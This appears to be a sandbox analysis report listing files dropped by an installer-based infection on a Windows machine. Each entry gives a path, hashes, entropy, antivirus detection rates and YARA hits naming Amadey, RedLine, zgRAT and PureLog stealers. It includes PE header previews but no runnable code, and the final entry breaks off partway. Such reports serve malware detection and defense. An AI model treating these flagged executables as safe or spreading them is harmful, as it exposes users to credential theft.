Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+X?\|o9Q/o9Q/o9Q/{RR.e9Q/{RT..9Q/{RU.}9Q/{RP.m9Q/=QT.r9Q/=QU.`9Q/=QR.z9Q/.PP.l9Q/o9P/j;Q/.PU.C9Q/.PQ.n9Q/.P./n9Q/.PS.n9Q/Richo9Q/................PE..L...3..c...........!.....d...~......Z........................................ .......9....@.............................4@...)..<.......................h).......S..@...T...............................@............................................text...Lb.......d.................. ..`.rdata...............h..............@..@.data...`I...`...6...D..............@....rsrc................z..............@..@.reloc...S.......T...~..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Fido Video Recorder\msvcp71.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	499712
Entropy (8bit):	6.414789978441117
Encrypted:	false
SSDEEP:	12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
MD5:	561FA2ABB31DFA8FAB762145F81667C2
SHA1:	C8CCB04EEDAC821A13FAE314A2435192860C72B8
SHA-256:	DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
SHA-512:	7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:\|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Fido Video Recorder\msvcr71.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.542655141037356
Encrypted:	false
SSDEEP:	6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
MD5:	86F1895AE8C5E8B17D99ECE768A70732
SHA1:	D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
SHA-256:	8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
SHA-512:	3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4\|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Fido Video Recorder\ssleay32.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	392048
Entropy (8bit):	6.542831007177094
Encrypted:	false
SSDEEP:	6144:1eIwnft+S34NVSTjMFR+oVbKQfbno1/1oz6i2EDSD4I+XdtQXGMiFcoOjAWcIhbl:1eIwnft+S34NVSTQD+oVbKQfrC/1ct25
MD5:	EE856A00410ECED8CC609936D01F954E
SHA1:	705D378626AEC86FECFDF04C86244006BC3AF431
SHA-256:	B6192300D3C1476EF3C25A368D055AA401035E78F9F6DBE5F93C84D36EF1FA62
SHA-512:	666D731247DAEAE4B57925DFA8CAE845327FD34E0F6B9AAD1BCF471D1800D7E8AF5642A5FB6E0EC58BA3AC7DD98A6D3FE0B473F34C16FFB9985621C98C0463EF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.v[N.%[N.%[N.%4.$QN.%4.$.N.%4.$IN.%4.$YN.%..$HN.%..$GN.%..$KN.%..$XN.%[N.%.O.%..$iN.%..$ZN.%.e%ZN.%..$ZN.%Rich[N.%........PE..L...D.r^...........!.....8..........^7.......P......................................'.....@..........................6..<)..L_..<.......X...............p3.......3..@,..............................`,..@............P...............................text....7.......8.................. ..`.rdata..l....P.......<..............@..@.data....?...p...6...X..............@....rsrc...X...........................@..@.reloc...3.......4..................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Fido Video Recorder\uninstall\is-4OQD3.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	720033
Entropy (8bit):	6.5224294039958215
Encrypted:	false
SSDEEP:	12288:sQCCh1TaLSSKrPD37zzH2A6QGgx/nstpq9KgER19zrNidbQgUHayxyF9:sQPh1eLSSKrPD37zzH2A6QD/srqggEQt
MD5:	D7DF6F3C984025773E86963D3BD54305
SHA1:	ED78EC29B1A74B80BCCB21E296E70BAABD37DAFE
SHA-256:	48A0C0ACEF73CA11C8138FF23862423D6DFA6434A8B230AEFFD2D7F1569C98AB
SHA-512:	97436165F979E80A8DF6D80832CD7C5777D28A01E7F8FA8AD055FB739311E17298DF5BE5827EE717D39B355D7E3A5205483551150E31ED6A5B6AA9BD6432505F
Malicious:	true
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................%........................................................... ......................................................CODE............................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..H....0......................@..P.rsrc...............................@..P.....................\..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Fido Video Recorder\uninstall\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	InnoSetup Log Fido Video Recorder, version 0x30, 4549 bytes, 571345\user, "C:\Users\user\AppData\Local\Fido Video Recorder"
Category:	dropped
Size (bytes):	4549
Entropy (8bit):	4.636976792889236
Encrypted:	false
SSDEEP:	96:mHgHbejWSl4jgApbSwTg93+eOIhuom4cVSQs0LEIeM6OHWwaru5:mHgHbejWW4jpbSY1HIhuAcVSQ1EIb6Od
MD5:	5C03E806657A3396A17B7AAE4DC0CBD0
SHA1:	2FFCFA9CAF004656F0B2FFFF3D7DEF415EB116D2
SHA-256:	79F5DF5309AEF5CF732547A0278668E41DF604CD75E84946C051D90A55109E3C
SHA-512:	758B53FFF1311A2323C3FAB44F5AA9F8A8779344D491BA767FA65DA87E651CAF221270053ED2CF479952EE3E42740DD7212DA3FE354AB0A2117774E8AC794F7D
Malicious:	false
Preview:	Inno Setup Uninstall Log (b)....................................Fido Video Recorder.............................................................................................................Fido Video Recorder.............................................................................................................0...........%................................................................................................................k..........^y@......R....571345.user1C:\Users\user\AppData\Local\Fido Video Recorder...............1.. .....k......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User

C:\Users\user\AppData\Local\Fido Video Recorder\uninstall\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	720033
Entropy (8bit):	6.5224294039958215
Encrypted:	false
SSDEEP:	12288:sQCCh1TaLSSKrPD37zzH2A6QGgx/nstpq9KgER19zrNidbQgUHayxyF9:sQPh1eLSSKrPD37zzH2A6QD/srqggEQt
MD5:	D7DF6F3C984025773E86963D3BD54305
SHA1:	ED78EC29B1A74B80BCCB21E296E70BAABD37DAFE
SHA-256:	48A0C0ACEF73CA11C8138FF23862423D6DFA6434A8B230AEFFD2D7F1569C98AB
SHA-512:	97436165F979E80A8DF6D80832CD7C5777D28A01E7F8FA8AD055FB739311E17298DF5BE5827EE717D39B355D7E3A5205483551150E31ED6A5B6AA9BD6432505F
Malicious:	true
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................%........................................................... ......................................................CODE............................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..H....0......................@..P.rsrc...............................@..P.....................\..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\12dsvc.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3274
Entropy (8bit):	5.3318368586986695
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
MD5:	0B2E58EF6402AD69025B36C36D16B67F
SHA1:	5ECC642327EF5E6A54B7918A4BD7B46A512BF926
SHA-256:	4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
SHA-512:	1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\cccc2.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\crypted.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	137
Entropy (8bit):	5.202653706100432
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUC7WyMLDRJ4LNRLFS9Am12MFuAvOAsyQHxW+uCv:Q3La/xwchM3RJoDLIP12MUAvvR+uCv
MD5:	8A8F1E8A778DFF107B41EA564681FE7B
SHA1:	08EFCFDC3E33281B2B107D16B739B72AF4898041
SHA-256:	D09CDD05DA4E3E875D3D5D66C542404519759ACDA2EFA7C00CA69AA3F6234DE4
SHA-512:	A372330793E09C661E6BF8B2C293C1AF81DE77972B8B4BA47055F07BE0FCDFE5E507ADBC53903A0CD90C392B36FE4A8A41D3FEA923AD97FA061DBEF65398EDF6
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gold.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000002001\gold.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hjhTHr6fWy.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3274
Entropy (8bit):	5.3318368586986695
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlq0
MD5:	0C1110E9B7BBBCB651A0B7568D796468
SHA1:	7AEE00407EE27655FFF0ADFBC96CF7FAD9610AAA
SHA-256:	112E21404A85963FB5DF8388F97429D6A46E9D4663435CC86267C563C0951FA2
SHA-512:	46E37552764B4E61006AB99F8C542D55B2418668B097D3C6647D306604C3D7CA3FAF34F8B4121D94B0E7168295B2ABEB7C21C3B96F37208943537B887BC81590
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\newbundle2.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3274
Entropy (8bit):	5.3318368586986695
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlq0
MD5:	0C1110E9B7BBBCB651A0B7568D796468
SHA1:	7AEE00407EE27655FFF0ADFBC96CF7FAD9610AAA
SHA-256:	112E21404A85963FB5DF8388F97429D6A46E9D4663435CC86267C563C0951FA2
SHA-512:	46E37552764B4E61006AB99F8C542D55B2418668B097D3C6647D306604C3D7CA3FAF34F8B4121D94B0E7168295B2ABEB7C21C3B96F37208943537B887BC81590
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\penis.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000254001\penis.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	425984
Entropy (8bit):	6.513416731775012
Encrypted:	false
SSDEEP:	12288:ISqMakU3v+GYLWIjD9dSbvBG5u2uQjdQco:jq53v+G4Wwub8Ljaco
MD5:	F5D7B79EE6B6DA6B50E536030BCC3B59
SHA1:	751B555A8EEDE96D55395290F60ADC43B28BA5E2
SHA-256:	2F1AFF28961BA0CE85EA0E35B8936BC387F84F459A4A1D63D964CE79E34B8459
SHA-512:	532B17CD2A6AC5172B1DDBA1E63EDD51AB53A4527204415241E3A78E8FFEB9728071BDE5AE1EEFABEFD2627F00963F8A5458668CD7B8DF041C8683252FF56B46
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L......f............................E.............@.......................................@.................................D...................................<L......8...............................@............................................text............................... ..`.rdata..8...........................@..@.data...\|f... ...4..................@....rsrc................0..............@..@.reloc..<L.......N...2..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\newbundle2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	311296
Entropy (8bit):	5.082545442352462
Encrypted:	false
SSDEEP:	3072:Eq6EgY6iArUjOvWUJwPYT8QADFKoRJTA+tJSiK1cZqf7D34leqiOLibBOT:vqY6iULwP/xnRJTAKJ81cZqf7DIvL
MD5:	58E8B2EB19704C5A59350D4FF92E5AB6
SHA1:	171FC96DDA05E7D275EC42840746258217D9CAF0
SHA-256:	07D4B7768E13D79AC5F05F81167B29BB6FBF97828A289D8D11EEC38939846834
SHA-512:	E7655762C5F2D10EC246D11F82D437A2717AD05BE847B5E0FD055E3241CAACA85430F424055B343E3A44C90D76A0BA07A6913C2208F374F59B61F8AA4477889F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\newbundle2[1].exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0................. ... ....@.. ....................... ............@.....................................O.... ..............................h................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	419328
Entropy (8bit):	6.1177703153619465
Encrypted:	false
SSDEEP:	6144:hVPD7/k5hjsld/TWx3EY9lwXtaW1G4kM0u0b2KrqBDW:hVPHXM31SC4kVu0rGB6
MD5:	A21700718C70EC5E787AD373CB72A757
SHA1:	027554AB5FF3245E7617F3B83D6548BF7919F92E
SHA-256:	87E639ECC7704CB5E29F1EBB1D8ADE3AE863AAA2505A37B28F2D45121DA500C6
SHA-512:	EA292A5442D9FE536E650A2BC5142DD3AEF79C66930243897E0E87C57915F0A54E45E03E58DAFFB473F85FE10B963D4670050BFF5AB3F91121D21D463E25659B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..J...........h... ........@.. ....................................@.................................`h..K.................................................................................... ............... ..H............text....H... ...J.................. ..`.rsrc................L..............@..@.reloc...............d..............@..B.................h......H........[..................................................................(....(.....0...........s........~....%:....&~......&...s....%.....(...+o.....8[....o...............%..F~2...(.....%..G~2...(.....%..H~2...(.....%..e~2...(.....~3...(.......o......8......(......s.......s........~....}....~...........s....(....o....}......{.....I~2...(....o........9......I~2...(.......8C........~2...(....o....:......{....~4...(....8......{....~5...(.........(...........9........o.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1929728
Entropy (8bit):	7.951250240981363
Encrypted:	false
SSDEEP:	49152:8lRNijSZ6fzUmuGLLv7CUBhp2skHe4LpFC/:8bNo7UJGLoHJj
MD5:	E0828E289DFBD343733236C6CFCEE121
SHA1:	D55235AAE5323348069AD77A8EDCD77D5E45D2A7
SHA-256:	C1C76C99FF4C06D6B9E252D52B397A0FA281E1AA1A51555193324DECFC0CBCA8
SHA-512:	CC1940ED569D48AB671E16B05CD2A34E03485220A25ABDD3F8E4D615717A6EE4465368B929BA18563CDB051A39DF803CEBD545FFAA8B07B6E07FDBF42E1849C4
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................L...........@...........................L......`....@.................................W...k.............................L.............................@.L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...ewzoukzh.`...02..X..................@...eahzsgud......L......L..............@....taggant.0....L.."...P..............@...................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\12dsvc[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	903168
Entropy (8bit):	7.997700688704897
Encrypted:	true
SSDEEP:	24576:9YroRg0QD2ZDvpSgezC2pSSqb9VAMsGm1ykciQgh75tT:9YroRmgSPC2MSpMsGmGiQg95t
MD5:	84263AB03B0A0F2B51CC11B93EC49C9F
SHA1:	E6457EB0E0131BEC70A2FD4D4A943314F0BD28D4
